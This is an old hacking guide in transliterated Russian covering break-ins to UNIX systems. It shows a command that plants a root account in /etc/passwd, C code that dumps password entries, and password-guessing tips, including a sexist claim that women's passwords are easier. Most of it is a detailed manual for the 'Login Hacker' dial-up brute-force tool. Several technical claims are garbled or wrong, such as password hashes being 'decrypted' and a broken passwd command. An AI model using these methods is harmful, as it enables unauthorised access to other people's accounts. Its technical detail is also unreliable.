Byl u fajla odin hozyain, a stal drugoj.
cron
|to demon tajmera, tochnee demon komand
batch i at.
crontab
Vy mozhete ukazat' promezhutki vremeni, v techenie kotoryh budut vypolneny
kakie-libo komandy.
ftp
Rabotaem s udalennym komp'yuterom. Prinimaem ili peresylaem fajly.
kill
Poslat' nekotoromu processu signal o konce raboty.
logname
Hochu poluchit' registracionnoe imya.
mail
Priem ili peresylka elektronnyh soobshchenij.
news
Otobrazit' stat'yu iz konferencii Usenet.
nslookup
Poluchit' svedeniya ob IP-adrese domena.
passwd
Sozdat'/izmenit' parol'.
ps
Prosmotret', kakie processy v tekushchij moment vremeni aktivizirovany.
pwcheck
|toj komandoj vy mozhete proverit' fajl parolej. Po umolchaniyu etot fajl
lezhit v kataloge /etc/passwd.
rm
Steret' fajl ili katalog.
sleep
Ne vypolnyat' komandu v konkretnyj promezhutok vremeni.
su
Umelo ispol'zuya etu komandu, haker mozhet stat' privilegirovannym
pol'zovatelem.
telnet
Dostup k udalennomu komp'yuteru.
umask
Esli vy tol'ko sozdaete fajl, to etoj komandoj vy mozhete zadat' tak
nazyvaemuyu masku polnomochij etogo fajla.
uucp
Kopiruem fajly iz odnogo komp'yutera UNIX v drugoj.
uuname
Otobrazit' spisok hostov UUCP.
uux
Vypolnenie komand UNIX na udalennom komp'yutere.
who
Otobrazit' spisok tekushchih pol'zovatelej.
whois
Poluchit' informaciyu o tekushchem pol'zovatele.
write
Pereslat' zapisku tekushchemu pol'zovatelyu.
Kogo vzlamyvayut v UNIX
V mire hakerov i kiberpankov sushchestvuet nebol'shaya gradaciya yuzerov UNIX.
n Technical Thug. Obychno sistemnyj
programmist, pishushchij skripty na sed,
C, awk, perl i APL.
n Administrative Fascist. Zakonchennyj
tuneyadec, vynuzhdennyj stat' sistemnym
administratorom UNIX.
n Maniac. Vzlomshchik s bol'shim opytom.
Pravda, ego talant v oblasti
komp'yuternogo shpionazha ne
oplachivaetsya ni Mosadom, ni Kuboj.
n Idiot. Obychno kretin ili staryj
programmist na Kobole, vybrannyj
sistemnym administratorom
Mezhdunarodnym Komitetom kretinov.
Lazejka, voznikayushchaya pri peredache fajlov cherez rcp
Esli parametr rcp utverzhden v fajle config.tel, to eto oznachaet, chto
otkryt dostup v sistemu iz Internet.
Novyj ekaunt
CHtoby sozdat' novyj ekaunt, haker ispol'zuet sleduyushchuyu konstrukciyu:
# cd /home;
mkdir "Bob's home directory"# echo "Bob Leontyef:
gandalf:0:0::/dev/tty:compress -f" > /etc/passwd
On mozhet takzhe napisat' scenarij na Perl, kotoryj sozdaet ishodnyj
katalog i kopiruet dannye v /etc/passwd, /etc/shadow i /etc/group.
Fajl parolej
Dostup k fajlu parolej mozhet byt' dazhe u prostogo pol'zovatelya. V
standartnom UNIX fajl parolej nahoditsya v kataloge /etc/passwd. V drugih
sistemah etot fajl mozhet nahodit'sya v drugom meste. Krome togo, fajl parolej
mozhet byt' skrytym.
Paroli v etom fajle zashifrovany. Rasshifrovkoj ili izvlecheniem
zanimayutsya special'nye programmy. Imenno oni i predostavlyayut v ruki hakera
samyj glavnyj parol' -- superyuzera root.
V fajle parolej soderzhatsya sem' idushchih po poryadku veshchej:
n Username
n Encrypted password
n User number
n Group Number
n GECOS Information
n Home directory
n Shell
Naprimer, fajl parolej iz /etc/passwd mozhet byt' predstavlen v
sleduyushchem vide:
bob:5fg63fhD3d5gh:9406:12:BobLeontyef:/home/fsg/will:/bin/bash
|ta zapis' perevoditsya tak:
n Imya pol'zovatelya: bob
n Rasshifrovka parolya: 5fg63fhD3d5gh
n Nomer pol'zovatelya: 9406
n Nomer gruppy: 12
n Informaciya GECOS: Bob Leontyef
n Katalog po umolchaniyu: /home/fsg/will
n Shell: /bin/bash
Unix-paroli rasshifrovyvayutsya tol'ko odnim sposobom. Special'naya
programma rasshifrovyvaet tekst, kotoryj vvoditsya v pole password i
sravnivaet etot tekst s formoj deshifrovki. Poetomu soft, kryakayushchij paroli,
ispol'zuet kollekciyu razlichnyh slov ili slovari. Kazhdoe slovo v takom
slovare rasshifrovyvaetsya i sravnivaetsya s formoj encrypted postupayushchego
parolya.
Luchshaya kryakalka parolej dlya Unix -- Crack by Alec Muffett, dlya DOS --
CrackerJack.
V UNIX shiroko primenyaetsya sistema skrytyh parolej: oblast' /etc/passwd
zamenyaetsya special'nym simvolom, a metod rasshifrovki hranitsya v otdel'nom
kataloge, kotoryj dostupen tol'ko pol'zovatelyu root. Ataka na mnogie skrytye
paroli osushchestvlyaetsya cherez special'no napisannuyu programmu, kotoraya
ispol'zuet posledovatel'nye zaprosy k getpwent, naprimer:
#include
main()
{
struct passwd *p;
while(p=getpwent())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
Malen'kij ishodnik dlya skrytogo fajla parolej
#include
main ()
{
struct passwd *p;
while(p=getpwent ())
printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
p->pw_uid, p->pw_gid, p->pw_gecos, p->pw_dir, p->pw_shell);
}
Konfiguraciya Linux i podklyuchenie k udalennomu uzlu
Skript udalennogo podklyucheniya lezhit v /usr/local/sbin/initppp. Dalee
idut konstrukcii:
#!/bin/sh
PPPD = "/usr/sbin/pppd"
$(PPPD) connect '/usr/sbin/chat -v "" ATZH0Q0M1 OK ATDT3560100 \
CONNECT "" ogin: Suserid word: "`cat /etc/ppp/password`"' \
/dev/modem 115200
Fajl v /usr/sbin/pppd yavlyaetsya standartnym, takim kak /dev/modem.
Naprimer, /dev/cua1. Ustanovka opcij dlya modema prohodit cherez komandu ln
-sf /dev/cua1 (dlya pervogo kommunikacionnogo porta).
Fajl parolej lezhit v /etc/ppp/password. CHerez skript haker mozhet
izmenit' parol' tak: `cat/etc/ppp/password`.
Network Information System ili drevnie zheltye stranicy UNIX
UNIX NIS pozvolyaet neskol'kim komp'yuteram seti imet' razlichnyj uroven'
dostupa k konfiguracionnym fajlami. Esli atakuemaya versiya UNIX ispol'zuet
NIS, to haker poluchit fajl parolej /etc/passwd s ochen' korotkoj strokoj,
tipa vot etoj:
+::0:0:::
CHtoby uvidet' dejstvitel'nyj fajl parolej haker ispol'zuet komandu
ypcat passwd.
Tainstvennyj znak posle zapyatoj
|tot znak sootvetstvuet vremeni hraneniya parolya. |to oznachaet, chto
parol' v opredelennyj moment vremeni mozhet byt' zamenen pol'zovatelem posle
sistemnogo administratora. Parol' pered zamenoj mozhet eshche hranit'sya
nekotoroe vremya. Tipichnaya zapis' /etc/passwd s dannymi o vremeni hraneniya
parolya:
bob:5fg63fhD3d,M.z8:9406:12:BobLeontyef:/home/fsg/will:/bin/bash
Obratite vnimanie na zapyatuyu v oblasti deshifrovki parolya. Znak posle
zapyatoj ispol'zuetsya tol'ko mehanizmom hraneniya parolya.
Takim obrazom, simvoly, sootvetstvuyushchie dannym vremeni hraneniya parolya
dlya vysheprivedennogo primera, budut takimi:
M.z8
|ti chetyre simvola interpretiruyutsya sleduyushchim obrazom:
Maksimal'noe chislo nedel', v techenie kotoryh parol' ne mozhet byt'
izmenen.
Minimal'noe chislo nedel', v techenie kotoryh parol' dolzhen
ispol'zovat'sya pered zamenoj.
Otmetim tri vazhnye veshchi. Esli pervye i vtorye simvoly ustanovleny kak
"..", to pol'zovatel' budet vynuzhden izmenit' svoj parol' v sleduyushchij raz. V
etom sluchae programma passwd udalit dannye o hranenii parolya.
Esli tretij i chetvertyj simvoly ustanovleny kak "..", to pol'zovatel'
budet vynuzhden izmenit' svoj parol' v sleduyushchij raz. Dannye o vremeni
hraneniya parolya budut sootvetstvovat' pervym i vtorym simvolam.
Esli zhe pervyj simvol (MAX) men'she chem vtoroj simvol (MIN), to
pol'zovatelyu voobshche ne pozvolyayut izmenit' parol' (tol'ko root mozhet ego
izmenit').
Zametim, chto haker ne mozhet komandoj su izmenit' dannye o vremeni
hraneniya parolya.
Dostup k fajlu parolej sistemy VMS
V VMS fajl parolej est'
SYS$SYSTEM: SYSUAF.DAT
Odnako, v otlichie ot pol'zovatelej UNIX, bol'shinstvo pol'zovatelej VMS
ne imeet dostupa dazhe k chteniyu etogo fajla. Haker mozhet vzlomat' parol' VMS
tol'ko cherez special'nuyu programmu, kotoraya ispol'zuet funkcii SYS$GETUAF
dlya sravneniya rezul'tiruyushchih rasshifrovannyh slov s rasshifrovannymi slovami,
poluchennymi iz dannyh SYSUAF.DAT. Dve takie programmy sleduyushchie:
CHECK_PASSWORD i GUESS_PASSWORD.
Vzlom po metodu Bivisa i Batt-Hedda
|to odin iz priemov ugadyvaniya parolya. Haker vhodit v set'. Pered nim
polya dannyh dlya vvoda logina i parolya. CHto on delaet? Ostavlyaet etu set' v
pokoe. On vhodit v etu zhe set' po drugomu puti. CHerez tu set', k kotoroj u
nego est' dostup. On telnetitsya s opredelennogo adresa IP i zapuskaet
programmu-vzlomshchik, kotoraya podbiraet (zapuskaet na udalennom komp'yutere
UNIX-programmu login) parol' i login, a zatem eshche i sama registriruetsya za
nego.
Vzlom sistem cherez drevnij Login Hacker
|ta bol'shaya i ves'ma gibkaya programma prednaznachena dlya vzloma mnogih
sistem. CHtoby proniknut' v sistemu, vy mozhete ispol'zovat' tri prilagaemyh k
programme fajla-slovarya, a takzhe Brute Force Generator. |ta programma takzhe
mozhet ispol'zovat'sya sistemnymi administratorami dlya proverki ih sistem na
vshivost'. Avtory etoj programmy predosteregayut vas: ne stoit pol'zovat'sya
etim softom v prestupnyh celyah, otvechat' pered zakonom budete tol'ko vy
sami. No, s drugoj storony, esli vy napishite horoshij skript (scenarij),
avtor etoj programmy nadeetsya, chto vy prishlete ishodnik po adresu:
vh@campus.de.
Konechno, bol'shinstvo sistem nahoditsya pod strogim nablyudeniem i mnogie
terpyat neudachu pri popytkah registracii (srabatyvaet sistema zashchity, trevoga
i novichok poluchaet putevku v ne stol' otdalennye mesta). Mnogie servery b'yut
trevogu uzhe posle desyati neudachnyh popytok zaregistrirovat'sya i, kak
pravilo, sistemnyj administrator znaet chto delat' dal'she. Vprochem, v Unix
imeyutsya nekotorye dyry, pozvolyayushchie podbirat' parol' i imya pol'zovatelya
prakticheski bez srabatyvaniya sistemy zashchity servera, to est' v konce-koncov
vy vhodite v sitemu. Dlya etogo vam nuzhen otrabotannyj v interaktivnom rezhime
skript i znanie nekotoryh komand Unix.
|tu programmu vy mozhete effektivno ispol'zovat' v staryh
telekommunikacionnyh sistemah, v kotoryh chislo popytok zaregistrirovat'sya
neogranicheno.
Dlya chego nuzhen vzlom? Konechno, dlya togo, chtoby vojti v sistemu. S
drugoj storony, avtor etoj programmy zapreshchaet pol'zovat'sya ej dlya polucheniya
kontrolya nad vsej sistemoj. |ta programma prednaznachena prezhde vsego dlya
teh, kto hochet poluchit' tol'ko odin ekaunt. Esli ego zarubyat, vy mozhete
snova vospol'zovat'sya etoj programmoj. Tol'ko dlya etogo. Nikakogo kriminala.
Mnogie paroli podbirayutsya legko. |to otnositsya k parolyam tak nazyvaemyh
srednih pol'zovatelej. Podbirat' parol', sootvetstvuyushchij ekauntu sitemnogo
administratora ves'ma-ves'ma chrevato. Naprimer, v Unix pri etom srabatyvaet
special'naya sistema zashchity i voznikaet soobshchenie ob oshibke (auth.crit):
CRITICAL. V sistemah NetWare podobnaya sistema nachinaet funkcionirovat' uzhe
posle neudachnyh registracij. Pomnite, chto prakticheski vse sistemy pozvolyayut
registrirovat'sya v kachestve sistemnogo administratora tol'ko s toj konsoli,
kotoraya prinadlezhit serveru s glavnoj sistemoj. Poetomu nikogda ne
vzlamyvajte rooturov, sistemnyh administratorov, krutyh menedzherov i drugih
setepodobnyh lichnostej.
Posle togo, kak vy vojdete v sistemu, poslednyaya stanet ves'ma uyazvimoj.
Poprobujte poluchit' tekstovoj fajl s opisaniem modernizacii servera, zatem
uznajte, kakie imeyutsya dyrki. Esli vozniknut problemy, popytajtes' poluchit'
pomoshch' u znakomogo vam hakera.
Kakih pol'zovatelej mozhno legko vzlamyvat'? Kak pravilo, paroli zhenshchin
podbirayutsya legche (oni obychno ispol'zuyut gostevuyu sistemu registracii), chem
paroli muzhchin. Poprobujte uznat' nastoyashchee imya pol'zovatelya, a uzhe zatem
podobrat' ego login, zatem lyubye zhenskie imena, slova iz zhargona
futbolistov, cifry 123, slova tipa "secret" i t.d. V sistemah Unix dlya togo,
chtoby uznat' login pol'zovatelya, mozhno vospol'zovat'sya komandoj finger ili
cherez komandu telnet votknut'sya v smtp-port i poluchit' polnye imena
pol'zovatelej.
Obychno, kogda osushchestvlena svyaz' s zaparolirovannoj sistemoj po
telefonnoj linii, vyvoditsya priglashenie "PASSWORD:". ili voobshche ekran
okazyvaetsya pustym.
Vazhno: Dostatochno legko vzlomat' tak nazyvaemye Silent Carriers.
Delaetsya vse posredstvom skripta programmy Login Hacker.
Fajly programmy
LOGINH.EXE
Programma Login Hacker.
LH-COMP.EXE
Kompilyator dlya skriptov.
X00.EXE
Drajver Fossil. Ispol'zujte etot drajver pri vypolnenii programmy.
Zagruzhaetsya drajver tak: X00.EXE E 2
FILE_ID.DIZ
Kratkaya informaciya o programme.
HISTORY.DOC
Bibliografiya programmy.
LOGINH.DOC
Dokumentaciya.
SCRIPT.DOC
Dokumentaciya po skriptam.
RESULT.DOC
Rezul'tat v vide kodov, poluchennyj posle vypolneniya Login Hacker.
UPDATE.DOC
Informaciya o tom, kak mozhno obnovit' programmu.
VH_BASE.DIC
Osnovnoj slovar'.
LH&SCAVE.TXT
Primer skripta, kotoryj ispol'zuyutsya vmeste s Scavenger Dialer.
THC&SCAV.SCR SCAVENGER
Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
REBREAK.SCR
Primer Scavenger-skripta. On nuzhen dlya skripta LH&SCAVE.TXT.
HANGUP.SCR
Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
PICKUP.SCR
Primer skripta, kotoryj nuzhen skriptu LH&SCAVE.TXT.
THC-LH_1.TXT
Pervyj primer, pokazyvayushchij primenenie yazyka skriptov.
THC-LH_2.TXT
Vtoroj primer, pokazyvayushchij primenenie yazyka skriptov.
DEC-SERV.TXT
Horosho oprobovannyj skript (avtor: Tron).
PASSCODE.TXT
Drugoj skript (avtor: Mind Maniac).
THC.NFO
Ochen' vazhno! Vse, chto kasaetsya izvestnogo soobshchestva.
LORE.COM
Ispolnyaemyj skript dlya LORE BBS (avtor: Plasmoid).
LOGINH.CFG
Kofiguracionnyj fajl.
LOGINH.LOG
Sozdannyj konfiguracionnyj fajl. Esli konfiguracionnyj fajl uzhe
sushchestvuet, to vse dannye budut dobavleny v ego konec. |tot fajl mozhet byt'
opredelen v sootvetstvuyushchem skripte ili cherez samu programmu v Hacking
Setup.
LOGINH.SCR
Skript, sozdannyj kompilyatorom LH-COMP.EXE. Tol'ko takie skripty mogut
byt' zagruzheny v Login Hacker.
LOGINH.HCK
Esli proizoshlo vynuzhdennoe preryvanie programmy, to sozdaetsya etot fajl
s podobnym rasshireniem. |tot fajl dannyh ukazyvaet na ustanovki,
sootvetstvuyushchie pervonachal'nym dannym slovarya Brute Force Generator. Esli
snova proizoshel sboj, to programma vydast soobshchenie s zaprosom o tom, nuzhno
li ispol'zovat' dannye iz etogo fajla. |to daet vam vozmozhnost' prervat'
sessiyu i ispol'zovat' predydushchie dannye v novoj atake. Pomnite, chto etot
fajl ne yavlyaetsya skriptom. |to fajl registracii. Esli vy zapisyvaete v etot
fajl dannye, poluchennye ot drugoj ataki, programma vse ravno poprosit vas
ispol'zovat' tol'ko dannye predydushchej ataki.
Komandy i parametry
Pervaya i samaya glavnaya komanda programmy Login Hacker so vsemi
vozmozhnymi parametrami vyglyadit tak:
LOGINH.EXE [scriptfile]/[anything] [-Auto] [-Shh:mm] [Ehh:mm]
[scriptfile]
Avtomaticheski zagruzhaet skompilirovannyj skript scriptfile i ozhidaet
vvoda klyucha dlya zagruzki.
[anything]
Esli etot parametr ne est' sushchestvuyushchij fajl, to programma zapuskaetsya
bez demonstracionnyh soobshchenij.
[-Auto]
|tot parametr zagruzhaet skript bez dopolnitel'nogo klyucha.
[-Shh:mm]
Nachal'noe vremya, to est' poshla ataka.
[-Ehh:mm]
Vremya, v techenie kotorogo proishodilo skanirovanie.
[-T]
Zapusk skripta v rezhime proverki. To est' skript ne zagruzhaetsya v
modem.
[-D]
Aktivizaciya rezhima otladki. V etom rezhime vy mozhete vybrat', kakuyu
komandu nuzhno vypolnyat' dal'she.
Vtoraya, ne menee vazhnaya komanda programmy Login Hacker so vsemi
vozmozhnymi parametrami vyglyadit tak:
LH-COMP.EXE [scriptfile]
[scriptfile]
Fajl, kotoryj budet podvergnut procedure kompilyacii.
Ispol'zovanie Login Hacker
Imeetsya pyat' opcij, neposredstvenno vliyayushchih na zapusk programmy:
L
Zagruzka otkompilirovannogo skripta i nachalo ataki.
S
Nastrojka modema i drugih osnovnyh parametrov programmy.
T
Terminal'nyj rezhim.
I
Nekotoraya informaciya.
Q
Vyhod.
|kran v interaktivnom rezhime
Rech' idet o tom momente, kogda proizoshla zagruzka i zapustilsya skript.
Vse, chto idet iz modema, vyglyadit na vashem ekrane simvolami belogo cveta.
Vse, chto zapisyvaetsya v fajl registracii, vyglyadit na vashem ekrane
temno-sinimi simvolami. Kazhdoe soobshchenie sistemy, v tom chisle CONNECT,
ALARM, HANGUP i ERROR dolzhno otobrazhat'sya sinim cvetom. Vse vysheskazannoe
spravedlivo lish' v tom sluchae, esli vy aktivizirovali opciyu Print Logoutput
to Screen too.
Goryachie klavishi v rezhime On-line
ESC
Pauza ili vyhod iz menyu.
F1
Poskazka.
ALT-B
Tak nazyvaemaya bazovaya klavisha. Pozvolyaet spryatat' ekran.
ALT-C
Ochistka ekrana.
ALT-D
Vklyuchit' ili vyklyuchit' rezhim otladki.
ALT-H
Vyzvat' menyu HangUp.
ALT-I
Otobrazit' na ekran statistiku i druguyu dopolnitel'nuyu informaciyu.
ALT-J
Prygnut' v DOS (ne pol'zujtes' etoj komandoj v beta-versiyah).
ALT-L
Osoboe menyu registracii.
ALT-T
Zagruzit' terminal'nyj rezhim. V etom rezhime ekran zavisaet, sistema
nahoditsya pod vashim kontrolem. Vy mozhete proizvesti identifikaciyu
posredstvom lyuboj iz vysheopisannyh klavish (krome ESC). CHtoby vyjti iz
terminal'nogo rezhima, nazhmite ALT-T ili ALT-X.
Opisanie yazyka skriptov
Skripty -- eto izyuminka Login Hacker. Poetomu, esli vy nauchites' pisat'
horoshie skripty, to smozhete vzlomat' prakticheski lyubuyu sistemu. Konechno eto
ne otnositsya k novichkam ili tem hakeram, kotorye nikogda ne programmirovali
dazhe na Bejsike.
Skript dolzhen projti cherez kompilyator, kotoryj proveryaet ego na
vshivost'. Poetomu vy mozhete byt' uvereny na 99%, chto v processe ataki ne
proizojdet sboya po vine plohogo skripta.
Itak, poehali.
Vse, chto nachinaetsya s tochki s zapyatoj -- kommentarii. Vse, chto
nachinaetsya s dvoetochiya -- perehod na sleduyushchuyu komandu.
CHetyre stroki, nachinayushchiesya s simvola # opredelyayut operatory, s kotoryh
nachinaetsya special'naya chast' skripta.
Operator #DEFINE opredelyaet peremennuyu.
Operator #NOCARRIER osushchestvlyaet avtomaticheskij vozvrat v programmu v
sluchae avarijnogo preryvaniya sessii, to est' bez komandy hangup.
Operator #START aktiviziruet zagruzku skripta.
Operator #END zakanchivaet vypolnenie skripta.
Vse peremennye yavlyayutsya neobyazatel'nymi. Isklyuchenie sostavlyayut
peremennye logfile i phone_nr. Vy ne mozhete opredelyat' kakie-libo
peremennye, za isklyucheniem teh, kotorye opisany nizhe.
LOGFILE=FILENAME
Opredelit' fajl registracii i mesto na diske dlya etogo fajla. |to
vazhnaya peremennaya ispol'zuetsya pri napisanii lyubogo skripta.
Naprimer:
LOGFILE=C:\OUTPUT\NY-SYS5.LOG
PHONE_NR=NUMBER
|ta peremennaya ispol'zuetsya vmeste s komandoj DIAL. Ee telo mozhet
sostoyat' kak iz cifr, tak i iz bukv. |to vtoraya peremennaya, kotoruyu vsegda
ispol'zuyut pri napisanii skriptov.
Naprimer:
PHONE_NR=1-800-WHO-CARES
INIT_MODEM=STRING
Esli vash modem dolzhen rabotat' v rezhime Pulse Dialing, to pomestite
pered telefonnym nomerom argument P. Esli zhe vash modem ne mozhet
inicializirovat' strokovye dannye, pomestite pered sootvetstvuyushchim
telefonnym nomerom komandu AT (esli eta komanda otststvuet v Hacker Setup).
Naprimer:
INIT_MODEM=Z
(zdes' takzhe mozhet stoyat' argument AT Z)
INIT_DATA=STRING
Inicializaciya kanalov peredachi dannyh, v tom chisle stopovyh bitov i
bitov chetnosti. Peremennaya ispol'zuetsya v tom sluchae, esli sootvetstvuyushchie
parametry otsutstvuyut v Hacker Setup. V obshchem sluchae argumentami etoj
peremennoj yavlyayutsya nabory simvolov 8N1 i 7E1, to est' argument vsegda
dolzhen sostoyat' iz treh simvolov. Pervyj simvol -- eto cifry 7 ili 8,
yavlyayushchiesya bitami dannyh. Vtoroj simvol mozhet byt' zapisan kak P (kontrol'
po nechetnosti), E (kontrol' po chetnosti) ili N (ne kontrolirovat' bity
dannyh). Tretij simvol sootvetstvuet situacii, kogda na pervyj startovyj bit
nalagaetsya pervyj stopovyj bit:
7/8+E/P/N+1/2.
DIAL_TRIES=NUMBER
|ta peremennaya opredelyaet kolichestvo popytok nabora nomera v diapazone
ot 0 do 65535. Nol' sootvetstvuet beskonechnomu naboru nomera. Esli nomer
nabran, zagruzhaetsya HANGUP i ostal'naya chast' skripta.
Naprimer:
DIAL_TRIES=3
Standard : 0
Vazhno: Esli eta peremennaya otsutstvuet v skripte, to budut ispol'zovany
ustanovki, sootvetstvuyushchie fajlu LOGINH.CFG.
LOGIN_TRIES=NUMBER
|ta peremennaya opredelyaet kolichestvo popytok vhoda v sistemu v
diapazone ot 0 do 2300000000. Nol' sootvetstvuet neogranichennoj popytke
zaregestrirovat'sya. Esli v fajle slovarya budet dostignut tak nazyvaemyj
konec kadra (EOF), to skript avtomaticheski povesit trubku i prekratit
sessiyu. Vremya, v techenie kotorogo budet osushchestvlyat'sya podbor
registracionnyh dannyh zavisit ot komand pricepki SEND_NEXT_DIC, NEXT_DIC
ili im analogichnyh dlya slovarya Brute Force Generator.
Naprimer:
LOGIN_TRIES=0
Standard: 0
Vazhno: Esli eta peremennaya otsutstvuet v skripte, to v atake budut
ispol'zovany ustanovki, sootvetstvuyushchie fajlu LOGINH.CFG.
DIC(NUMBER)=FILENAME
Opredelit' slovar', kotoryj budet ispol'zovan sootvetstvuyushchim skriptom.
Argument DIC ukazyvaet na sushchestvuyushchie fajly slovarej. Vy mozhete pricepit' k
skriptu ot odnogo do treh slovarej. Ispol'zujte dlya etogo komandy
Send_Next_DIC (1), Send_DIC (1) i Next_DIC (1).
Naprimer:
DIC(1)=C:\HACKING\DICTIONA.RY\BAD_PWS.DIC
FROM_DIC(NUMBER)=STRING
Opredelit' slovo, nachinaya s kotorogo mozhno ispol'zovat' slovar' v
skripte.
Naprimer: FROM_DIC(1)=Tracy
BRUTE(NUMBER)=STRING,NUMBER,NUMBER,NUMBER
Opredelit' slovar' Brute Force Generator dlya ispol'zovaniya v skripte.
Brute Force Generator ves'ma gibok. CHetyre parametra slovarya Brute Force
Generator razdeleny zapyatoj. Nizhe opisyvaetsya priemlemaya specifikaciya etih
parametrov.
1
a=bukvy nizhnego registra.
A=bukvy verhnego registra.
1=cifry.
$=specsimvoly.
^=tak nazyvaemye kontroliruemye simvoly.
Lyubye sinonimy ASCII.
2
|tot parametr soobshchaet skriptu, kakoe kolichestvo razlichnyh simvolov,
sootvetstvuyushchih parametru 1 neobhodimo etomu skriptu.
Kazhdoe sgenerirovannoe slovo, sootvetstvuyushchee parametru 1 vsegda
imeetsya v takom zhe slove, sootvetstvuyushchim parametru 2. Simvol verhnego
registra i odin nomer dopustimy. Velichina, sootvetstvuyushchaya nulyu nepriemlema.
3
Soobshchaet skriptu vozmozhnuyu minimal'nuyu dlinu dlya simvolov parolya,
podobrannogo pri ispol'zovanii slovarya Brute Force Generator.
4
Vozmozhnaya maksimal'naya dlina dlya simvolov parolya, podobrannogo pri
ispol'zovanii slovarya Brute Force Generator.
Vazhno: Minimal'naya dlina simvolov ravna 1, maksimal'naya sootvetstvuet
12.
Pomnite, chto vy mozhete ispol'zovat' v atake do treh slovarej Brute
Force Generator. Ispol'zujte dlya etogo velikolepnye komandy privyazki
Next_Brute(1), Send_Next_Brute(1) i Send_Brute(1).
Naprimer:
BRUTE(1)=a,1,1,6
V etom primere ispol'zuetsya pervyj parametr Brute Force Generator so
sleduyushchimi dannymi: proveryat' tol'ko simvoly nizhnego registra; predpolozhit',
chto pri podbore parolya v slovare prisutstvuet hotya by odin dejstvitel'nyj
simvol; minimal'naya dlina registracionnogo slova ravna edinice, maksimal'naya
-- shesti.
FROM_BRUTE(number)=STRING
Nachat' inicializaciyu so slovarem Brute Force Generator. Pri etom vazhno
sleduyushchee: esli inicializaciya nachalas' s chetvertoj bukvy, a vy
prosmatrivaete diapazon ot 1 do 8 bukvy, to diapazon ot 1 do 3 budet
ignorirovat'sya, to est' snachala idet podbor aaaa, zatem aaab, zatem aaac i
t.d.
Naprimer:
FROM_BRUTE(1)=2527
Sekciya #NOCARRIER
|to budet vypolnyat'sya vsyakij raz, kogda vy ne ispol'zuete komandu
HANGUP. Esli v skripte otsutstvuyut operatory GOTO (*START) ili GOTO (1), to
dal'she on vypolnyat'sya ne budet. |to oznachaet, chto vy snova dolzhny nabrat'
modemnyj nomer dostupa k sisteme. Poetomu prover'te ustanovki v DIAL_TRIES.
Sekciya #START
V etoj vazhnoj sekcii opisyvayutsya operatory, kotorye v dal'nejshem budut
lomat' sistemu.
LOG(STRING)
Komanda LOG() zapisyvaet v fajl registracii nekotoruyu informaciyu. |to
mozhet byt' lyuboj tekst, peremennye, pered kotorymi vsegda dolzhen stoyat' znak
$ (znak dollara), a takzhe probely mezhdu slovami. V konec stroki kazhdaya
komanda LOG() avtomaticheski pechataet vozvrat karetki.
Primery:
LOG(Beginning on $DATE * $TIME)
Budet vyvedeno sleduyushchee:
"Beginning on 24-12-96 * 23:00"
LOG_(STRING)
|tot primer analogichen vysheprivedennomu, za isklyucheniem togo, chto posle
teksta otsutstvuet CRLF (End-Of-Line).
:NUMBER
Kazhdaya liniya, nachinayushchayasya s : (dvoetochiya) markiruetsya operatorom GOTO.
Vy mozhete ispol'zovat' 240 markirovok v diapazone ot 1 do 240. Drugie nomera
nepriemlemy. Perehod k nuzhnomu markeru osushchestvlyaetsya komandami peredachi
upravleniya GOTO, GOSUB, CHECK4OUTPUT i CHECK4CARRIER.
Naprimer: :1
V etom primere na sootvetstvuyushchuyu stroku vypolnyaetsya perehod k tochke s
nomerom 1.
GOTO(NUMBER)
Peredat' upravlenie na markirovku perehoda. Vy mozhete takzhe osushchestvit'
perehod komandami #START, #NOCARRIER i #END.
Naprimer: GOTO(#END) (vypolnenie skripta zaversheno).
GOSUB(NUMBER)
S komandoj podstanovki GOSUB vy osushchestvlyaete perehod k sleduyushchej
markirovke. Komanda GOSUB, kak pravilo ispolnyaetsya uzhe posle perehoda na
sleduyushchij marker, to est' v tot moment, kogda komandy GOSUB i RETURN
stolknutsya mezhdu soboj. Obratite vnimanie, chto vot takaya komanda nevozmozhna:
GOSUB(#END).
Naprimer: GOSUB(4)
RETURN
|to tak nazyvaemaya komanda vyhoda iz podprogrammy. Ispol'zuya etu
komandu, vy mozhete vozvratit'sya k mestopolozheniyu poslednej vypolnennoj
komandy GOSUB i prodolzhit' obychnoe vypolnenie skripta. Esli v bufernom
registre komanda RETURN stalkivaetsya s nesushchestvuyushchim nachal'nym adresom
GOSUB, to ona budet ignorirovat'sya. V odnom bufernom registre vy mozhete
imet' do 255 podstanovok GOSUB.
Naprimer: RETURN
CHECK4CARRIER(NUMBER)
Proverka modema na soedinenie s liniej, to est' proverka na nesushchuyu
chastototu. Komanda budet vypolnyat'sya v sluchae otsutstviya perehoda k
ukazannoj markirovke (perehod sootvetstvuet komande GOTO). Esli perehod
obnaruzhen, to ustanavlivaetsya vnutrennee soedinenie s peremennoj TRUE dlya
proverki na NO_CARRIERS. Vy mozhete takzhe osushchestvlyat' procedury perehoda k
*NOCARRIER, *START i *END. Takzhe vozmozhno osushchestvit' proverku modema tol'ko
na ON ili OFF. Esli komanda CHECK4CARRIER(ON) vypolnena s perehodom k
markeru, otmechayushchemu obnaruzhenie linii, i, esli predstavlen NOT, to
upravlenie peredaetsya na *NoCarrier. |ta komanda polezna tol'ko v tom
sluchae, kogda vy okazyvaetes' na CHECK4CARRIER(OFF) i ne hotite ispol'zovat'
komandu DIAL, chtoby soedinit'sya s udalennoj sistemoj (pozvol'te nabrat'
nomer SCAVENGER DIALER).
Primery:
CHECK4CARRIER(#NOCARRIER)
CHECK4CARRIER(5)
CHECK4CARRIER(ON)
CHECK4CARRIER(OFF)
CHECK4OUTPUT(NUMBER)
|to budet vypolneno podobno nizheopisannoj funkcii ALARM: Esli vyhodnoj
signal (OUTPUT) modema obnaruzhen, to perehody budut osushchestvlyat'sya
neposredstvenno k ukazannoj markirovke. Vy mozhete takzhe peredat' upravlenie
k *NOCARRIER, *START i *END. Takzhe vozmozhno otklyuchit' proverku na OFF, to
est' zablokirovat' ukazannuyu proverku vyhodnogo signala.
Naprimer:
CHECK4CARRIER(#NOCARRIER)
CHECK4CARRIER(5)
CHECK4CARRIER(OFF)
DIAL
Nabor nomera PHONE_NR. Esli s sistemoj net soedineniya, to snachala v
modem budet poslana komanda: "Povesit' trubku!".
Naprimer: DIAL
HANGUP
Podnyat' i opustit' trubku.
Naprimer: HANGUP
